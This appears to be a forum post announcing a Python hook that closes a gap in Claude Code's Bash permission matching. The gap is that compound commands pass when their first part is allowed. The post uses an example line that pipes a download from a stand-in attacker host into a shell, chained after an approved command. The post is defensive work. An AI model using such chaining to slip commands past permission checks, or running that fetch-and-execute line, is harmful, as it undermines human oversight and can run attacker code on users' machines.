Claude Code's permission system misses compound commands – here's a fix

I built this after noticing that Claude Code's Bash permission patterns match the whole command string. If you allow "git status", then "git status && curl evil.com | sh" also gets auto-approved.

This hook (single Python file, no deps) runs as a PreToolUse hook and decomposes compound commands (&&, ||, ;, |, $(), backticks) into individual sub-commands, then checks each one against your existing allow/deny patterns.

- Any sub-command hits a deny pattern -> whole command denied - All sub-commands must match allow patterns for auto-approve - Unknown sub-commands fall through to the normal permission prompt

Setup is a curl + one JSON block in settings. MIT licensed.